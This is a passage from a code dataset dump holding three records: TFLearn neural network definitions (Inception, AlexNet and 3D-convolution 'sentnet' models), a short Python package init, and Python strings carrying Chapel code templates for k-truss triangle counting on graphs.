pool4_3_3, 256, filter_size=1, activation="relu", name="inception_5a_1_1"
)
inception_5a_3_3_reduce = conv_3d(
pool4_3_3, 160, filter_size=1, activation="relu", name="inception_5a_3_3_reduce"
)
inception_5a_3_3 = conv_3d(
inception_5a_3_3_reduce,
320,
filter_size=3,
activation="relu",
name="inception_5a_3_3",
)
inception_5a_5_5_reduce = conv_3d(
pool4_3_3, 32, filter_size=1, activation="relu", name="inception_5a_5_5_reduce"
)
inception_5a_5_5 = conv_3d(
inception_5a_5_5_reduce,
128,
filter_size=5,
activation="relu",
name="inception_5a_5_5",
)
inception_5a_pool = max_pool_3d(
pool4_3_3, kernel_size=3, strides=1, name="inception_5a_pool"
)
inception_5a_pool_1_1 = conv_3d(
inception_5a_pool,
128,
filter_size=1,
activation="relu",
name="inception_5a_pool_1_1",
)
inception_5a_output = merge(
[inception_5a_1_1, inception_5a_3_3, inception_5a_5_5, inception_5a_pool_1_1],
axis=4,
mode="concat",
)
inception_5b_1_1 = conv_3d(
inception_5a_output,
384,
filter_size=1,
activation="relu",
name="inception_5b_1_1",
)
inception_5b_3_3_reduce = conv_3d(
inception_5a_output,
192,
filter_size=1,
activation="relu",
name="inception_5b_3_3_reduce",
)
inception_5b_3_3 = conv_3d(
inception_5b_3_3_reduce,
384,
filter_size=3,
activation="relu",
name="inception_5b_3_3",
)
inception_5b_5_5_reduce = conv_3d(
inception_5a_output,
48,
filter_size=1,
activation="relu",
name="inception_5b_5_5_reduce",
)
inception_5b_5_5 = conv_3d(
inception_5b_5_5_reduce,
128,
filter_size=5,
activation="relu",
name="inception_5b_5_5",
)
inception_5b_pool = max_pool_3d(
inception_5a_output, kernel_size=3, strides=1, name="inception_5b_pool"
)
inception_5b_pool_1_1 = conv_3d(
inception_5b_pool,
128,
filter_size=1,
activation="relu",
name="inception_5b_pool_1_1",
)
inception_5b_output = merge(
[inception_5b_1_1, inception_5b_3_3, inception_5b_5_5, inception_5b_pool_1_1],
axis=4,
mode="concat",
)
pool5_7_7 = avg_pool_3d(inception_5b_output, kernel_size=7, strides=1)
pool5_7_7 = dropout(pool5_7_7, 0.4)
loss = fully_connected(pool5_7_7, output, activation="softmax")
network = regression(
loss,
optimizer="momentum",
loss="categorical_crossentropy",
learning_rate=lr,
name="targets",
)
model = tflearn.DNN(
network,
checkpoint_path=model_name,
max_checkpoints=1,
tensorboard_verbose=0,
tensorboard_dir="log",
)
return model
def sentnet_LSTM_gray(width, height, frame_count, lr, output=9):
network = input_data(shape=[None, width, height], name="input")
# network = tflearn.input_data(shape=[None, 28, 28], name='input')
network = tflearn.lstm(network, 128, return_seq=True)
network = tflearn.lstm(network, 128)
network = tflearn.fully_connected(network, 9, activation="softmax")
network = tflearn.regression(
network, optimizer="adam", loss="categorical_crossentropy", name="output1"
)
model = tflearn.DNN(
network,
checkpoint_path="model_lstm",
max_checkpoints=1,
tensorboard_verbose=0,
tensorboard_dir="log",
)
return model
def sentnet_color(
width, height, frame_count, lr, output=9, model_name="sentnet_color.model"
):
network = input_data(shape=[None, width, height, 3, 1], name="input")
network = conv_3d(network, 96, 11, strides=4, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 256, 5, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 256, 3, activation="relu")
network = max_pool_3d(network, 3, strides=2)
network = conv_3d(network, 256, 5, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 256, 3, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, output, activation="softmax")
network = regression(
network,
optimizer="momentum",
loss="categorical_crossentropy",
learning_rate=lr,
name="targets",
)
model = tflearn.DNN(
network,
checkpoint_path=model_name,
max_checkpoints=1,
tensorboard_verbose=0,
tensorboard_dir="log",
)
return model
def sentnet_frames(width, height, frame_count, lr, output=9):
network = input_data(shape=[None, width, height, frame_count, 1], name="input")
network = conv_3d(network, 96, 11, strides=4, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 256, 5, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 256, 3, activation="relu")
network = max_pool_3d(network, 3, strides=2)
network = conv_3d(network, 256, 5, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 256, 3, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, output, activation="softmax")
network = regression(
network,
optimizer="momentum",
loss="categorical_crossentropy",
learning_rate=lr,
name="targets",
)
model = tflearn.DNN(
network,
checkpoint_path="model_alexnet",
max_checkpoints=1,
tensorboard_verbose=0,
tensorboard_dir="log",
)
return model
def sentnet2(width, height, frame_count, lr, output=9):
network = input_data(shape=[None, width, height, frame_count, 1], name="input")
network = conv_3d(network, 96, 11, strides=4, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 256, 5, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 256, 3, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 3, activation="softmax")
network = regression(
network,
optimizer="momentum",
loss="categorical_crossentropy",
learning_rate=lr,
name="targets",
)
model = tflearn.DNN(
network,
checkpoint_path="model_alexnet",
max_checkpoints=1,
tensorboard_verbose=0,
tensorboard_dir="log",
)
return model
def sentnet(width, height, frame_count, lr, output=9):
network = input_data(shape=[None, width, height, frame_count, 1], name="input")
network = conv_3d(network, 96, 11, strides=4, activation="relu")
network = avg_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 256, 5, activation="relu")
network = avg_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 256, 3, activation="relu")
network = max_pool_3d(network, 3, strides=2)
network = conv_3d(network, 256, 5, activation="relu")
network = avg_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 384, 3, activation="relu")
network = conv_3d(network, 256, 3, activation="relu")
network = avg_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, output, activation="softmax")
network = regression(
network,
optimizer="momentum",
loss="categorical_crossentropy",
learning_rate=lr,
name="targets",
)
model = tflearn.DNN(
network,
checkpoint_path="model_alexnet",
max_checkpoints=1,
tensorboard_verbose=0,
tensorboard_dir="log",
)
return model
def alexnet2(width, height, lr, output=3):
network = input_data(shape=[None, width, height, 1], name="input")
network = conv_2d(network, 96, 11, strides=4, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = local_response_normalization(network)
network = conv_2d(network, 256, 5, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = local_response_normalization(network)
network = conv_2d(network, 384, 3, activation="relu")
network = conv_2d(network, 384, 3, activation="relu")
network = conv_2d(network, 256, 3, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = conv_2d(network, 256, 5, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = local_response_normalization(network)
network = conv_2d(network, 384, 3, activation="relu")
network = conv_2d(network, 384, 3, activation="relu")
network = conv_2d(network, 256, 3, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = local_response_normalization(network)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, output, activation="softmax")
network = regression(
network,
optimizer="momentum",
loss="categorical_crossentropy",
learning_rate=lr,
name="targets",
)
model = tflearn.DNN(
network,
checkpoint_path="model_alexnet",
max_checkpoints=1,
tensorboard_verbose=0,
tensorboard_dir="log",
)
return model
def sentnet_v0(width, height, frame_count, lr, output=9):
network = input_data(shape=[None, width, height, frame_count, 1], name="input")
network = conv_3d(network, 96, 11, strides=4, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 256, 5, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = conv_3d(network, 384, 3, 3, activation="relu")
network = conv_3d(network, 384, 3, 3, activation="relu")
network = conv_3d(network, 256, 3, 3, activation="relu")
network = max_pool_3d(network, 3, strides=2)
# network = local_response_normalization(network)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, output, activation="softmax")
network = regression(
network,
optimizer="momentum",
loss="categorical_crossentropy",
learning_rate=lr,
name="targets",
)
model = tflearn.DNN(
network,
checkpoint_path="model_alexnet",
max_checkpoints=1,
tensorboard_verbose=0,
tensorboard_dir="log",
)
return model
def alexnet(width, height, lr, output=3):
network = input_data(shape=[None, width, height, 1], name="input")
network = conv_2d(network, 96, 11, strides=4, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = local_response_normalization(network)
network = conv_2d(network, 256, 5, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = local_response_normalization(network)
network = conv_2d(network, 384, 3, activation="relu")
network = conv_2d(network, 384, 3, activation="relu")
network = conv_2d(network, 256, 3, activation="relu")
network = max_pool_2d(network, 3, strides=2)
network = local_response_normalization(network)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, 4096, activation="tanh")
network = dropout(network, 0.5)
network = fully_connected(network, output, activation="softmax")
network = regression(
network,
optimizer="momentum",
loss="categorical_crossentropy",
learning_rate=lr,
name="targets",
)
model = tflearn.DNN(
network,
checkpoint_path="model_alexnet",
max_checkpoints=1,
tensorboard_verbose=0,
tensorboard_dir="log",
)
return model
| 30.515782
| 88
| 0.644115
| 5,678
| 42,539
| 4.429553
| 0.036104
| 0.095742
| 0.080156
| 0.113793
| 0.94374
| 0.935867
| 0.929903
| 0.919765
| 0.919765
| 0.903105
| 0
| 0.083362
| 0.251863
| 42,539
| 1,393
| 89
| 30.537688
| 0.706929
| 0.040598
| 0
| 0.708
| 0
| 0
| 0.106626
| 0.036637
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0096
| false
| 0
| 0.0048
| 0
| 0.024
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4b362733980e488b6d5a98d98aa88dfc9b36c431
| 176
|
py
|
Python
|
mdde/core/mdde/registry/protocol/__init__.py
|
akharitonov/mdde
|
b0443f3c9c3ca948e9dda213572926087c214d8d
|
[
"MIT"
] | 1
|
2021-05-17T11:17:51.000Z
|
2021-05-17T11:17:51.000Z
|
mdde/core/mdde/registry/protocol/__init__.py
|
akharitonov/mdde
|
b0443f3c9c3ca948e9dda213572926087c214d8d
|
[
"MIT"
] | 4
|
2020-05-30T12:23:04.000Z
|
2021-12-25T12:59:14.000Z
|
mdde/core/mdde/registry/protocol/__init__.py
|
akharitonov/mdde
|
b0443f3c9c3ca948e9dda213572926087c214d8d
|
[
"MIT"
] | null | null | null |
from .p_registry_client_control import PRegistryControlClient
from .p_registry_client_read import PRegistryReadClient
from .p_registry_client_write import PRegistryWriteClient
| 44
| 61
| 0.914773
| 21
| 176
| 7.238095
| 0.52381
| 0.098684
| 0.256579
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068182
| 176
| 3
| 62
| 58.666667
| 0.926829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
29bb6f75c40b91ffe3ff19c390d38b1f39b693c4
| 493,658
|
py
|
Python
|
server/GenTrussMsg.py
|
Bears-R-Us/arkouda-njit
|
9c957797852747b907736f76cc51191c578069ea
|
[
"MIT"
] | 2
|
2022-02-08T23:13:09.000Z
|
2022-02-09T18:47:07.000Z
|
server/GenTrussMsg.py
|
Bears-R-Us/arkouda-njit
|
9c957797852747b907736f76cc51191c578069ea
|
[
"MIT"
] | 1
|
2022-03-04T02:24:04.000Z
|
2022-03-04T02:24:04.000Z
|
server/GenTrussMsg.py
|
Bears-R-Us/arkouda-njit
|
9c957797852747b907736f76cc51191c578069ea
|
[
"MIT"
] | 2
|
2022-03-23T19:21:23.000Z
|
2022-03-27T23:56:53.000Z
|
Parameters='''(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{'''
ParametersAtomic='''(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] atomic int):string throws{'''
MaxParametersAtomic='''(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,
TriCount:[?D5] atomic int, EdgeDeleted:[?D6] int ):bool{
'''
FunStartVariables='''
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge: atomic int;
var k=kvalue:int;
var timer:Timer;
var largest:int;
largest=Ne;
RemovedEdge.write(0);
'''
FunStartFuncs='''
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
RemovedEdge.add(1);
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
RemovedEdge.add(1);
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
'''
FunStartPreProcessing='''
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
RemovedEdge.add(1);
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
writeln("Preprocessing removed ",RemovedEdge.read(), " edges");
//writeln("After Preprocessing");
'''
FunStart=FunStartVariables+FunStartFuncs+FunStartPreProcessing
MaxFunStartAtomic=FunStartVariables+FunStartFuncs
TimerAndWhileStart='''
timer.start();
ConFlag=true;
while (ConFlag) {
'''
ListIntersectionTriCount='''
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var uadj = new set(int, parSafe = true);
var vadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>0) ){
forall x in dst[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_iR[u];
endTmp=beginTmp+neiR[u]-1;
if ((neiR[u]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(x,u);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ( (nei[v]>0) ){
forall x in dst[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
beginTmp=start_iR[v];
endTmp=beginTmp+neiR[v]-1;
if ((neiR[v]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(x,v);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
if (! uadj.isEmpty() ){
var Count=0:int;
forall s in uadj with ( + reduce Count) {
//var e=findEdge(s,v);
if ( vadj.contains(s) ) {
Count +=1;
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
MarkDelEdges='''
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
RemovedEdge.add(SetCurF.getSize());
'''
NaiveListIntersection=TimerAndWhileStart+ListIntersectionTriCount+MarkDelEdges
SetSearchSmallTriCount='''
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var sVadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
var sV:int;
var lV:int;
var ldV:int;
if ( du<=dv ) {
sV=u; //sV is the small degree vertex
lV=v; //lV is the large degree vertex
ldV=dv; //ldV is the degree number
} else {
sV=v;
lV=u;
ldV=du;
}
// here we search from the vertex who has small degree
{
var beginTmp=start_i[sV];
var endTmp=beginTmp+nei[sV]-1;
if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
if ( (nei[sV]>0) ){
forall x in dst[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
beginTmp=start_iR[sV];
endTmp=beginTmp+neiR[sV]-1;
if ((neiR[sV]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(x,sV);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
if (! sVadj.isEmpty() ){
var Count=0:int;
forall s in sVadj with ( + reduce Count) {
var ds1=nei[s]+neiR[s];
var e:int;
if (ds1<ldV) {
e=findEdge(s,lV);
} else {
e=findEdge(lV,s);
}
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if EdgeDeleted[i]==-1
}// end of triangle counting
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
NaiveSetSearchSmall= TimerAndWhileStart+SetSearchSmallTriCount+MarkDelEdges
SetSearchSmallSeqTriCount='''
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var sVadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
var sV:int;
var lV:int;
var ldV:int;
if ( du<=dv ) {
sV=u; //sV is the small degree vertex
lV=v; //lV is the large degree vertex
ldV=dv; //ldV is the degree number
} else {
sV=v;
lV=u;
ldV=du;
}
// here we search from the vertex who has small degree
{
var beginTmp=start_i[sV];
var endTmp=beginTmp+nei[sV]-1;
if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
if ( (nei[sV]>0) ){
for x in dst[beginTmp..endTmp] {
var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
beginTmp=start_iR[sV];
endTmp=beginTmp+neiR[sV]-1;
if ((neiR[sV]>0) ){
for x in dstR[beginTmp..endTmp] {
var e=exactEdge(x,sV);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
if (! sVadj.isEmpty() ){
var Count=0:int;
for s in sVadj {
var ds1=nei[s]+neiR[s];
var e:int;
if (ds1<ldV) {
e=findEdge(s,lV);
} else {
e=findEdge(lV,s);
}
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if EdgeDeleted[i]==-1
}// end of triangle counting
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
NaiveSetSearchSmallSeq=TimerAndWhileStart+SetSearchSmallSeqTriCount+MarkDelEdges
PathMergeTriCount='''
// first we calculate the number of triangles
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge {
TriCount[i]=0;
var u = src[i];
var v = dst[i];
var beginUf=start_i[u];
var endUf=beginUf+nei[u]-1;
var beginUb=start_iR[u];
var endUb=beginUb+neiR[u]-1;
var beginVf=start_i[v];
var endVf=beginVf+nei[v]-1;
var beginVb=start_iR[v];
var endVb=beginVb+neiR[v]-1;
var iu:int;
var jv:int;
var eu:int;
var ev:int;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
iu=beginUf;
jv=beginVf;
//writeln("Enter while 1 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVf)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dst[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUf;
jv=beginVb;
//writeln("Enter while 2 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVb)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dst[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUb;
jv=beginVf;
//writeln("Enter while 3 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVf)) {
eu=findEdge(dstR[iu],u);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dstR[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUb;
jv=beginVb;
//writeln("Enter while 4 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVb)) {
eu=findEdge(dstR[iu],u);
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dstR[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
NaivePathMerge=TimerAndWhileStart+PathMergeTriCount+MarkDelEdges
MinSearchTriCount='''
// first we calculate the number of triangles using mininum search method.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
var Count:int;
Count=0;
if (EdgeDeleted[i]==-1) {
TriCount[i]=0;
var v1=src[i];
var v2=dst[i];
